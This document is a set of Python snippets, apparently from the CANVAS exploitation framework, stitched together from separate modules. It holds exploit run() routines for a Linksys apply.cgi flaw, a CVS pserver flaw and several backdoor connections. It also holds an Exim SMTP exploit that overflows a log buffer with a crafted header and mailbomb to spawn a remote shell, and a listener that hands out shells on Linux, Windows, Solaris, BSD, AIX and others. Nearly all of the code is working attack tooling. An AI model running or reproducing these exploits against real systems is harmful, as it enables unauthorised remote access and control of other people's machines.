def dorun(self): linksysapplycgiExploit.__init__(self, self.host, self.port) self.sock = self.attack() if not self.sock: self.log("exploitation failed") return 0 self.setInfo("%s %s:%d successfully exploited!" % (NAME, self.host, self.port)) self.t = Telnet() self.t.sock = self.sock self.log("restarting httpd...") self.t.write("/usr/sbin/httpd;/sbin/check_ps >/dev/null 2>&1;\n") if self.cmdline: self.proxy() return try: shell = shelllistener(shellfromtelnet(self.t), logfunction=self.logfunction, simpleShell=1) except: self.log( "Could not make a shell listener - connection was closed. Exploit most likely failed." ) self.setProgress(-1) return 0 node = unixShellNode.unixShellNode() node.parentnode = self.argsDict["passednodes"][0] node.shell = shell return node
def run(self): self.host = self.target.interface self.port = self.argsDict["port"] if self.version == self.LINUX: CVSpserverdLinux.__init__(self) shell = self.dorun() # cmdline mode (just for this exploit .. not generic :/) if hasattr(self, 'cmdline') and self.cmdline: return shell # return failure elif shell in [0, 1, None]: return shell # init node else: # return unix shell node for gui shell.write("/bin/sh -i\n") import unixShellNode from shelllistener import shelllistener from shelllistener import shellfromtelnet node = unixShellNode.unixShellNode() node.parentnode = self.argsDict["passednodes"][0] node.shell = shelllistener(shellfromtelnet(shell)) return node
def convertToCanvas(self, sock): self.log('Starting UnixShellNode') tn = Telnet() tn.sock = sock node = unixShellNode.unixShellNode() node.parentnode = self.argsDict['passednodes'][0] node.shell = shelllistener(shellfromtelnet(tn), simpleShell=1) return node
def run(self): self.getArgs() #thread off to listen for the post listenDaemon = threading.Thread(target=self.listen3010) listenDaemon.setDaemon(True) listenDaemon.start() time.sleep(2) #thread off to make the post sendPost = threading.Thread(target=self.makePost) sendPost.start() #self.makePost() time.sleep(3) #wait for the request to hit the listener self.host = self.target.interface self.port = 1337 self.setInfo("%s attacking %s:%d (in progress)" % (NAME, self.host, self.port)) logging.info("Attacking %s:%d (in progress)" % (self.host, self.port)) try: s = self.gettcpsock() s.connect((self.host, self.port)) except socket.error: logging.info("Backdoor connection not successful") self.setProgress(-1) return 0 telnetshell = Telnet() telnetshell.sock = s self.setProgress(80) try: # Success, convert to unixShellNode through shellfromtelnet. shell = shelllistener(shellfromtelnet(telnetshell), logfunction=self.logfunction) except: logging.info( "Could not make a shell listener - connection was closed. Exploit most likely failed" ) import traceback print '-' * 60 logging.traceback(file=sys.stdout) print '-' * 60 self.setProgress(-1) return 0 node = unixShellNode.unixShellNode() node.parentnode = self.argsDict["passednodes"][0] node.shell = shell self.setInfo("%s attacking %s:%d (success!)" % (NAME, self.host, self.port)) return node
def run(self): self.host = self.target.interface self.port = int(self.argsDict.get("port", self.port)) self.setInfo("%s attacking %s:%d (in progress)" % (NAME, self.host, self.port)) self.log("Attacking %s:%d" % (self.host, self.port)) try: s = self.gettcpsock() s.connect((self.host, self.port)) except socket.error: self.log("backdoor connection not successful.") self.setProgress(-1) return 0 telnetshell = Telnet() telnetshell.sock = s self.setProgress(80) try: shell = shelllistener(shellfromtelnet(telnetshell), logfunction=self.logfunction) except: self.log( "Could not make a shell listener - connection was closed. Exploit most likely failed." ) import traceback print '-' * 60 traceback.print_exc(file=sys.stdout) print '-' * 60 self.setProgress(-1) return 0 node = unixShellNode.unixShellNode() node.parentnode = self.argsDict["passednodes"][0] #shell=shelllistener(shellfromtelnet(tn)) node.shell = shell self.setInfo("%s attacking %s:%d (success!)" % (NAME, self.host, self.port)) return node
def run(self): """ Actually exploit the target. """ self.host = self.target.interface self.port = int(self.argsDict.get("port", self.port)) self.username = self.argsDict.get("username", self.username) self.setInfo("%s attacking %s:%d" % (NAME, self.host, self.port)) #first make socket connection to target self.log("Connecting to %s:%d" % (self.host, self.port)) #self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.s = self.gettcpsock() try: self.s.connect((self.host, int(self.port))) except: self.log("Could not connect!") self.setInfo("%s attacking %s:%d - done (failed)" % (NAME, self.host, self.port)) return 0 self.IAC_neg() self.do_exploit() # need to add error checking telnetshell = Telnet() telnetshell.sock = self.s try: shell = shelllistener(shellfromtelnet(telnetshell)) node = unixShellNode.unixShellNode() node.parentnode = self.argsDict["passednodes"][0] node.shell = shell except: self.log("Connection closed during exploit - server is patched.") self.setInfo("%s attacking %s:%d - done (failed)" % (NAME, self.host, self.port)) return None self.setInfo("%s attacking %s:%d - done (success!)" % (NAME, self.host, self.port)) #shell should always be valid here.... return node
self.log("Data: '%s'" % data) self.setProgress(50) if data.count(self.prompt) == 0 and data.count(self.cshprompt) == 0: #we failed to log in self.log("We failed to log in.") self.setInfo("%s attacked %s:%d (failed)" % (NAME, self.host, self.port)) return None if data.count(self.cshprompt): self.prompt = "% " self.setProgress(75) node = unixShellNode.unixShellNode() node.parentnode = self.argsDict["passednodes"][0] shell = shelllistener(shellfromtelnet(tn)) node.shell = shell shell.node = node self.setInfo("%s attacking %s:%d (succeeded!)" % (NAME, self.host, self.port)) return node #this stuff happens. if __name__ == '__main__': print "Running CANVAS %s Exploit v %s" % (DESCRIPTION, VERSION) app = theexploit() ret = standard_callback_commandline(app) if ret not in [0, 1, None]: ret.interact()
def run(self): self.getArgs() self.host = self.target.interface self.setInfo("%s attacking %s:%d" % (NAME, self.host, self.port)) try: s = smtplib.SMTP(self.host, self.port, timeout=10) except: self.log("Could not connect to smtp") return False s.sock.set_timeout(20) try: if self.ehlo_name == "": s.ehlo() else: s.ehlo(self.ehlo_name) except: self.log("EHLO failed") return False # Parse out the client hostname and ip address from the EHLO response self.log("EHLO reply: %s" % s.ehlo_resp) response = re.split(" |\t|\r\n|\n", s.ehlo_resp) self.target_name = response[0] self.client_name, self.client_ip = response[2:4] if self.ehlo_name == "": self.ehlo_name = s.local_hostname # Eliminate the encapsulating [] from the target ip address self.client_ip = self.client_ip[1:-1] self.log("Parsing EHLO response.") self.log("Target name = " + self.target_name) self.log("Client name = " + self.client_name) self.log("Client IP = " + self.client_ip) # Send MAIL FROM using client name. if self.mail_from == "": self.mail_from = "canvas@%s" % self.client_name try: n, r = s.docmd("MAIL FROM: %s" % self.mail_from) except: self.log("SMTP server disconnected") return False if n != 250: self.log("MAIL FROM command failed: %d %s" % (n, r)) return False # Send RCPT TO using target name. if self.rcpt_to == "": self.rcpt_to = "postmaster@%s" % self.target_name try: n, r = s.docmd("RCPT TO: <%s>" % self.rcpt_to) except: self.log("SMTP server disconnected") return False if n != 250: self.log("RCPT TO command failed: %d %s" % (n, r)) return False # Send DATA command. try: n, r = s.docmd("DATA") except: self.log("SMTP server disconnected") return False if n != 354: self.log("DATA command failed: %d %s" % (n, r)) return False # Proceed to send out the headers log_space = self.get_log_buffer_space() self.log("Log buffer space: %u" % log_space) # Fill the log buffer by sending headers. We reserve three bytes # for the "%c " used for the next header, and the terminating 0 # reserved in string_format() itself. self.log("Filling log buffer with %u bytes" % (log_space - 3)) try: filled = self.fill_log_buffer(s.sock, log_space - 3) except: self.log("Filling log failed") return False self.log("Sent %u header bytes to accomplish this" % filled) # Send over the attack string self.log("Sending attack string") try: self.send_evil_header(s.sock) except: self.log("Sending evil header failed") return False # And finally send 50MiB of crap to go over the message size. self.log("Sending larger message than allowed...") try: self.mailbomb(s.sock) except: self.log("Sending mailbomb failed") return False self.log("Done!") # Send '.' command to terminate the mail. We expect this to # result in a 552 error. try: n, r = s.docmd(".") except: self.log("SMTP server disconnected") return False if n != 552: self.log("Sending message did not trigger 552: %d %s" % (n, r)) return False # Trigger the ACL which string_expands() our evil header. self.log("Trying to trigger bug") try: s.sock.send("MAIL FROM: <*****@*****.**>\r\n") except: self.log("Sending trigger failed") return False # See what the remote answered. This should drain either the # SMTP return code, or the shell command line. self.log("Verifying trigger") try: s.sock.recv(4096) except: self.log("Error reading trigger response. Daemon crashed?") return False # Verify if things worked. We send a string with backslashes in # there, as the shell will eat them, while an MTA will not. try: s.sock.send("/bin/echo har\\har\\har\\har\r\n") except: self.log("Sending of verifier failed") # See what the remote answered. try: response = s.sock.recv(4096) except: self.log("Error reading trigger response. Daemon crashed?") return False # harharharhar is not guaranteed to be seen in the response (for instance ubuntu 9.x with exim 4.6x) # (maybe) better way to judge success is to try and execute a command and check reply # if response.find("harharharhar") == -1 and response.find("access tty") == -1 and response.find("$") == -1: # self.log("Exploit failed. Did not spawn a shell.") # self.log("Response was: " + response) # return False # self.log("Success! Trigger response: " + response) # Success, convert to unixShellNode through shellfromtelnet. try: node = unixShellNode.unixShellNode() node.parentnode = self.argsDict["passednodes"][0] tnshell = Telnet() tnshell.sock = s.sock shell = shelllistener(shellfromtelnet(tnshell)) ret = shell.runcommand('/bin/uname -a') if not ret: raise Exception('No reason') self.log('Runcommand output: %s' % ret) except: self.log('Exploit failed. Did not spawn a shell: %s' % response) return False self.log('Success! Trigger response: ' + response) node.shell = shell shell.node = node self.setInfo("%s attacking %s:%d (succeeded!)" % (NAME, self.host, self.port)) return node
def handleConnection(self, connection): try: connection.set_timeout(None) except: self.log("[!] likely an ipv6 socket, set_timeout not supported !") server = None if self.type == self.targets.index("LINUXEXECVE_INTEL"): self.log("Connected: Running a Linux server...") import linuxMosdefShellServer #time.sleep(10) newshell = unixShellNode() pnode = localNode() pnode.newNode(newshell) server = linuxMosdefShellServer.execveshellserver( connection, newshell) #server.addInitString(self.initstring) #server.addInitString("chrootbreak") server.startup() elif self.type == self.targets.index("LINUXMOSDEF_INTEL"): self.log("Connected, Linux MOSDEF ...") newshell = linuxNode() pnode = localNode() pnode.newNode(newshell) shell = MosdefShellServer('Linux', 'i386')(connection, newshell) #shell=linuxMosdefShellServer.linuxshellserver(connection,newshell) shell.argsDict = self.argsDict newshell.startup() server = shell elif self.type == self.targets.index('OSXMOSDEF_INTEL'): self.log('Connected, OSX MOSDEF INTEL ...') newshell = osxNode() pnode = localNode() pnode.newNode(newshell) shell = MosdefShellServer('OSX', 'i386')(connection, newshell) shell.argsDict = self.argsDict newshell.startup() server = shell elif self.type == self.targets.index("OSXMOSDEF_PPC"): self.log("Connected, OSX MOSDEF PPC ...") import osxMosdefShellServer newshell = osxNode() pnode = localNode() pnode.newNode(newshell) shell = osxMosdefShellServer.osxshellserver(connection, newshell) shell.argsDict = self.argsDict newshell.startup() server = shell elif self.type == self.targets.index("WIN32MOSDEF_INTEL"): self.log("Connected, running win32 MOSDEF server") import win32MosdefShellServer from win32Node import win32Node newshell = win32Node() pnode = localNode() pnode.newNode(newshell) shell = win32MosdefShellServer.win32shellserver(connection, newshell, logfunction=None) shell.argsDict = self.argsDict newshell.startup() server = shell elif self.type == self.targets.index("SOLARISMOSDEF_SPARC"): self.log("Connected, Solaris MOSDEF ...") import solarisMosdefShellServer newshell = solarisNode() pnode = localNode() pnode.newNode(newshell) shell = solarisMosdefShellServer.solarisshellserver( connection, newshell) shell.argsDict = self.argsDict newshell.startup() server = shell elif self.type == self.targets.index("SOLARISMOSDEF_INTEL"): self.log("Connected, Solaris x86 MOSDEF ...") import solarisMosdefShellServer newshell = solarisNode() pnode = localNode() pnode.newNode(newshell) shell = solarisMosdefShellServer.solarisx86shellserver( connection, newshell) shell.argsDict = self.argsDict newshell.startup() server = shell elif self.type == self.targets.index("BSDMOSDEF_INTEL"): self.log("Connected, BSD MOSDEF") import bsdMosdefShellserver newshell = bsdNode() pnode = localNode() pnode.newNode(newshell) shell = bsdMosdefShellserver.bsdshellserver(connection, newshell) shell.argsDict = self.argsDict newshell.startup() server = shell elif self.type == self.targets.index("AIXMOSDEF_51_PPC"): self.log("Connected, AIX MOSDEF") newshell = aixNode() pnode = localNode() pnode.newNode(newshell) aixMosdefShellServer = MosdefShellServer('AIX', 'PowerPC') shell = aixMosdefShellServer(connection, newshell, version='5.1') shell.argsDict = self.argsDict newshell.startup() server = shell elif self.type == self.targets.index("AIXMOSDEF_52_PPC"): self.log("Connected, AIX MOSDEF") newshell = aixNode() pnode = localNode() pnode.newNode(newshell) aixMosdefShellServer = MosdefShellServer('AIX', 'PowerPC') shell = aixMosdefShellServer(connection, newshell, version='5.2') shell.argsDict = self.argsDict newshell.startup() server = shell elif self.type == self.targets.index("PHPMULTI"): newsocket = connection self.log("Starting up a %s server" % type) import phplistener from ScriptShellServer import phpshellserver node = ScriptNode() node.parentnode = self.engine.getLocalNode() shell = phpshellserver(newsocket, node) shell.startup() newshell = node server = shell elif self.type == self.targets.index("UNIXSHELL"): newsocket = connection self.log("Starting up Unix Shell") pnode = localNode() telnetshell = Telnet() telnetshell.sock = newsocket shell = shelllistener(shellfromtelnet(telnetshell), logfunction=self.log) newshell = unixShellNode() newshell.shell = shell shell.node = newshell pnode.newNode(newshell) server = shell elif self.type == self.targets.index("JAVA"): newsocket = connection self.log("Starting up a %s server" % type) from Nodes.JavaShellServer import javashellserver from JavaNode import JavaNode node = JavaNode() node.parentnode = self.engine.getLocalNode() shell = javashellserver(newsocket, node) shell.startup() newshell = node server = shell else: print "Don't know what type I am!" sys.exit(1) if self.mode == "interactive": print "Letting user interact with server" if server: server.interact() else: print "No server...exiting this shell..." elif self.mode == "Run one command": print "Running a command or set of commands" if self.uploadfiles != []: for f in self.uploadfiles: print "Uploading %s" % f # Why doesn't this use exploits/upload/upload.py then? print server.upload(f) print server.runcommand(self.command) ###insert your post-op stuff here!!! ###you might want: ###server.doexitthread(1) ###or server.runexitprocess() if server: server.disconnect() return